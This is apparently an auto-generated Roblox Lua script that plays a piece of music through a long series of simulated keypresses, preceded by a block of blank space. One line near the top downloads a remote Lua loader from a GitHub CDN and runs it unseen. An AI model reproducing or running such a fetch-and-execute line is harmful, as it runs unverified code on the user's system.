                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        task.spawn(function(...)
-- Generated by MIDI2LUA --
-- MIDI88: ON --
-- Short Notes: OFF --
-- Note Velocity: OFF --
-- Sustain Pedal: OFF --
-- Midi Spoofer: OFF --

bpm = 110

loadstring(game:HttpGet("https://cdn.jsdelivr.net/gh/hellohellohell012321/TALENTLESS@main/loader_main.lua", true))()

keypress("k", 1, bpm)
keypress("Ctrl+q", 1, bpm)
keypress("0", 1, bpm)
keypress("w", 1, bpm)
keypress("r", 1, bpm)
keypress("u", 1, bpm)
keypress("5", 1, bpm)
rest(1, bpm)
keypress("j", 1, bpm)
keypress("Ctrl+9", 1, bpm)
keypress("I", 1, bpm)
keypress("r", 1, bpm)
keypress("w", 1, bpm)
keypress("Q", 1, bpm)
keypress("9", 1, bpm)
keypress("4", 1, bpm)
rest(1, bpm)
keypress("H", 1, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("W", 1, bpm)
keypress("r", 1, bpm)
keypress("y", 1, bpm)
keypress("9", 1, bpm)
keypress("q", 1, bpm)
keypress("*", 1, bpm)
keypress("O", 1, bpm)
keypress("3", 1, bpm)
rest(1, bpm)
keypress("j", 2, bpm)
keypress("Ctrl+e", 1, bpm)
keypress("t", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("8", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("6", 1, bpm)
rest(0.5, bpm)
keypress("l", 0.5, bpm)
rest(0.25, bpm)
keypress("t", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("Ctrl+e", 1, bpm)
keypress("6", 1, bpm)
keypress("x", 0.5, bpm)
rest(0.5, bpm)
keypress("t", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("l", 0.5, bpm)
rest(0.5, bpm)
keypress("j", 2.5, bpm)
keypress("Ctrl+4", 1, bpm)
keypress("1", 1, bpm)
keypress("z", 0.5, bpm)
rest(0.5, bpm)
keypress("t", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("l", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
keypress("h", 0.5, bpm)
rest(0.25, bpm)
keypress("t", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("g", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+e", 1, bpm)
keypress("t", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("8", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("6", 1, bpm)
keypress("f", 3, bpm)
rest(0.5, bpm)
keypress("H", 0.5, bpm)
rest(0.25, bpm)
keypress("t", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("j", 0.5, bpm)
keypress("Ctrl+e", 1, bpm)
keypress("6", 1, bpm)
rest(0.5, bpm)
keypress("k", 0.5, bpm)
keypress("t", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("l", 0.5, bpm)
keypress("Ctrl+4", 1, bpm)
keypress("1", 1, bpm)
rest(0.5, bpm)
keypress("x", 0.5, bpm)
keypress("t", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("l", 0.5, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
rest(0.25, bpm)
keypress("t", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("j", 0.5, bpm)
rest(0.5, bpm)
keypress("h", 5, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("o", 0.75, bpm)
keypress("3", 1, bpm)
rest(0.5, bpm)
keypress("k", 0.5, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
rest(0.25, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
keypress("l", 0.5, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
keypress("z", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+q", 1, bpm)
keypress("5", 1, bpm)
keypress("l", 0.5, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
keypress("k", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("G", 0.5, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
rest(0.25, bpm)
keypress("f", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("o", 0.75, bpm)
keypress("3", 1, bpm)
keypress("a", 2, bpm)
rest(0.75, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
rest(0.25, bpm)
keypress("x", 1, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
keypress("k", 1, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
rest(0.5, bpm)
keypress("k", 1, bpm)
keypress("Ctrl+q", 1, bpm)
keypress("5", 1, bpm)
keypress("h", 1, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
rest(0.5, bpm)
keypress("h", 1, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("f", 1, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
rest(0.75, bpm)
keypress("G", 2, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("Y", 0.75, bpm)
keypress("r", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("Q", 0.75, bpm)
keypress("(", 0.75, bpm)
keypress("I", 0.75, bpm)
keypress("7", 1, bpm)
keypress("D", 2, bpm)
rest(0.75, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("I", 0.5, bpm)
keypress("C", 0.75, bpm)
rest(0.25, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
keypress("Z", 0.5, bpm)
rest(0.5, bpm)
keypress("G", 1.5, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
keypress("D", 2.5, bpm)
keypress("k", 0.75, bpm)
rest(0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("j", 0.75, bpm)
rest(0.25, bpm)
keypress("Ctrl+0", 1, bpm)
keypress("$", 1, bpm)
rest(0.25, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("G", 1, bpm)
rest(0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("Y", 0.75, bpm)
keypress("r", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("Q", 0.75, bpm)
keypress("(", 0.75, bpm)
keypress("I", 0.75, bpm)
keypress("7", 1, bpm)
rest(0.5, bpm)
keypress("k", 0.5, bpm)
keypress("G", 0.5, bpm)
keypress("D", 0.5, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("k", 0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("G", 0.5, bpm)
keypress("D", 0.5, bpm)
rest(0.5, bpm)
keypress("l", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
keypress("h", 0.5, bpm)
keypress("f", 0.5, bpm)
rest(0.5, bpm)
keypress("k", 0.5, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
keypress("G", 0.5, bpm)
keypress("D", 0.5, bpm)
rest(0.5, bpm)
keypress("G", 0.5, bpm)
keypress("x", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.5, bpm)
keypress("j", 0.5, bpm)
keypress("Ctrl+0", 1, bpm)
keypress("Z", 0.5, bpm)
keypress("$", 1, bpm)
rest(0.25, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("h", 0.5, bpm)
keypress("C", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("x", 4, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("3", 1, bpm)
keypress("f", 4, bpm)
rest(0.75, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+t", 0.5, bpm)
keypress("7", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+e", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("6", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+q", 0.5, bpm)
keypress("5", 0.5, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("Ctrl+0", 0.5, bpm)
keypress("$", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+8", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("3", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+8", 2.5, bpm)
keypress("r", 2.5, bpm)
keypress("w", 2.5, bpm)
keypress("0", 2.5, bpm)
keypress("u", 2.5, bpm)
keypress("3", 2.5, bpm)
rest(0.5, bpm)
keypress("l", 1, bpm)
rest(1, bpm)
keypress("k", 1, bpm)
rest(1, bpm)
keypress("h", 1, bpm)
rest(1, bpm)
keypress("f", 2, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("3", 1, bpm)
rest(0.75, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("h", 0.25, bpm)
rest(0.25, bpm)
keypress("Ctrl+q", 1, bpm)
keypress("5", 1, bpm)
keypress("k", 0.25, bpm)
rest(0.25, bpm)
keypress("k", 0.75, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("f", 2.5, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
keypress("z", 0.25, bpm)
rest(0.25, bpm)
keypress("z", 0.75, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+q", 1, bpm)
keypress("5", 1, bpm)
keypress("k", 0.5, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("j", 0.25, bpm)
keypress("k", 0.25, bpm)
rest(0.25, bpm)
keypress("k", 0.5, bpm)
rest(0.25, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("3", 1, bpm)
rest(0.25, bpm)
keypress("k", 1.5, bpm)
rest(0.25, bpm)
keypress("D", 0.5, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("f", 0.5, bpm)
keypress("Ctrl+q", 1, bpm)
keypress("5", 1, bpm)
rest(0.5, bpm)
keypress("G", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("h", 0.5, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
rest(0.5, bpm)
keypress("k", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("j", 0.5, bpm)
keypress("Ctrl+q", 1, bpm)
keypress("5", 1, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("h", 0.5, bpm)
rest(0.5, bpm)
keypress("G", 5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("r", 0.75, bpm)
keypress("Y", 0.75, bpm)
keypress("Q", 0.75, bpm)
keypress("(", 0.75, bpm)
keypress("7", 1, bpm)
rest(0.75, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("H", 0.25, bpm)
rest(0.25, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
keypress("j", 0.25, bpm)
rest(0.25, bpm)
keypress("H", 0.25, bpm)
rest(0.25, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("j", 0.75, bpm)
rest(0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.25, bpm)
keypress("H", 0.25, bpm)
rest(0.25, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("j", 0.25, bpm)
rest(0.25, bpm)
keypress("H", 0.25, bpm)
rest(0.25, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
keypress("j", 0.75, bpm)
rest(0.25, bpm)
keypress("(", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
rest(0.5, bpm)
keypress("k", 0.25, bpm)
rest(0.25, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("r", 0.75, bpm)
keypress("Y", 0.75, bpm)
keypress("Q", 0.75, bpm)
keypress("(", 0.75, bpm)
keypress("7", 1, bpm)
keypress("l", 2, bpm)
rest(0.75, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Q", 0.5, bpm)
rest(0.25, bpm)
keypress("j", 1, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
rest(0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
rest(0.5, bpm)
keypress("G", 1, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
rest(0.5, bpm)
keypress("f", 1, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
rest(0.25, bpm)
keypress("(", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
rest(0.75, bpm)
keypress("D", 2, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("r", 0.75, bpm)
keypress("Y", 0.75, bpm)
keypress("Q", 0.75, bpm)
keypress("(", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("I", 0.75, bpm)
keypress("7", 1, bpm)
rest(0.5, bpm)
keypress("k", 0.5, bpm)
rest(0.25, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
keypress("l", 0.5, bpm)
rest(0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("I", 0.5, bpm)
keypress("j", 0.25, bpm)
rest(0.25, bpm)
keypress("H", 0.25, bpm)
rest(0.25, bpm)
keypress("D", 2.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("j", 0.5, bpm)
rest(0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("I", 0.5, bpm)
keypress("j", 0.25, bpm)
rest(0.25, bpm)
keypress("h", 0.25, bpm)
rest(0.25, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
keypress("G", 0.25, bpm)
rest(0.25, bpm)
keypress("(", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("I", 0.5, bpm)
keypress("h", 0.25, bpm)
rest(0.25, bpm)
keypress("j", 1.75, bpm)
rest(0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("r", 0.75, bpm)
keypress("Y", 0.75, bpm)
keypress("Q", 0.75, bpm)
keypress("(", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("I", 0.75, bpm)
keypress("7", 1, bpm)
rest(0.5, bpm)
keypress("d", 0.5, bpm)
rest(0.25, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("D", 0.5, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
rest(0.5, bpm)
keypress("f", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.5, bpm)
keypress("G", 0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.5, bpm)
keypress("j", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.5, bpm)
keypress("h", 0.5, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
rest(0.25, bpm)
keypress("(", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("j", 0.5, bpm)
rest(0.5, bpm)
keypress("k", 5, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("o", 0.75, bpm)
keypress("3", 1, bpm)
rest(0.5, bpm)
keypress("f", 0.25, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
keypress("G", 0.25, bpm)
rest(0.25, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("h", 0.5, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
keypress("G", 0.25, bpm)
rest(0.25, bpm)
keypress("h", 0.25, bpm)
rest(0.25, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
keypress("j", 0.5, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
keypress("h", 0.25, bpm)
rest(0.25, bpm)
keypress("G", 0.25, bpm)
rest(0.25, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("f", 0.25, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
keypress("G", 0.25, bpm)
rest(0.25, bpm)
keypress("h", 1.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
keypress("3", 1, bpm)
rest(1, bpm)
keypress("k", 1, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("0", 1, bpm)
keypress("w", 1, bpm)
keypress("r", 1, bpm)
keypress("u", 1, bpm)
keypress("3", 1, bpm)
keypress("z", 1, bpm)
keypress("h", 1, bpm)
rest(1, bpm)
keypress("j", 1, bpm)
keypress("Ctrl+0", 1, bpm)
keypress("I", 1, bpm)
keypress("r", 1, bpm)
keypress("w", 1, bpm)
keypress("Q", 1, bpm)
keypress("9", 1, bpm)
keypress("$", 1, bpm)
keypress("l", 1, bpm)
keypress("G", 1, bpm)
rest(1, bpm)
keypress("H", 1, bpm)
keypress("Ctrl+w", 1, bpm)
keypress("W", 1, bpm)
keypress("r", 1, bpm)
keypress("y", 1, bpm)
keypress("9", 1, bpm)
keypress("q", 1, bpm)
keypress("*", 1, bpm)
keypress("O", 1, bpm)
keypress("%", 1, bpm)
keypress("k", 1, bpm)
keypress("g", 1, bpm)
rest(1, bpm)
keypress("j", 0.5, bpm)
keypress("Ctrl+e", 1, bpm)
keypress("t", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("8", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("6", 1, bpm)
keypress("l", 1.75, bpm)
keypress("f", 2, bpm)
rest(0.5, bpm)
keypress("j", 0.25, bpm)
rest(0.25, bpm)
keypress("t", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("H", 0.25, bpm)
rest(0.25, bpm)
keypress("Ctrl+4", 1, bpm)
keypress("1", 1, bpm)
keypress("j", 0.5, bpm)
rest(0.5, bpm)
keypress("t", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("k", 0.25, bpm)
rest(0.25, bpm)
keypress("l", 0.25, bpm)
rest(0.25, bpm)
keypress("j", 2.5, bpm)
keypress("Ctrl+e", 1, bpm)
keypress("6", 1, bpm)
keypress("l", 2.5, bpm)
keypress("f", 2.5, bpm)
rest(0.25, bpm)
keypress("z", 0.25, bpm)
rest(0.25, bpm)
keypress("t", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("x", 2, bpm)
rest(0.5, bpm)
keypress("Ctrl+4", 1, bpm)
keypress("1", 1, bpm)
rest(0.25, bpm)
keypress("t", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.75, bpm)
keypress("Ctrl+e", 1, bpm)
keypress("t", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("8", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("6", 1, bpm)
rest(0.5, bpm)
keypress("H", 0.5, bpm)
rest(0.25, bpm)
keypress("t", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("j", 0.5, bpm)
keypress("Ctrl+4", 1, bpm)
keypress("1", 1, bpm)
rest(0.5, bpm)
keypress("k", 0.5, bpm)
keypress("t", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("l", 0.5, bpm)
keypress("Ctrl+e", 1, bpm)
keypress("6", 1, bpm)
rest(0.5, bpm)
keypress("x", 0.5, bpm)
keypress("t", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("l", 0.5, bpm)
keypress("Ctrl+4", 1, bpm)
keypress("1", 1, bpm)
rest(0.25, bpm)
keypress("t", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("j", 0.5, bpm)
rest(0.5, bpm)
keypress("h", 0.5, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("o", 0.75, bpm)
keypress("3", 1, bpm)
rest(0.5, bpm)
keypress("h", 0.25, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
keypress("G", 0.25, bpm)
rest(0.25, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("h", 0.5, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
keypress("j", 0.25, bpm)
rest(0.25, bpm)
keypress("k", 0.5, bpm)
rest(0.25, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
keypress("h", 3, bpm)
rest(0.25, bpm)
keypress("j", 0.25, bpm)
rest(0.25, bpm)
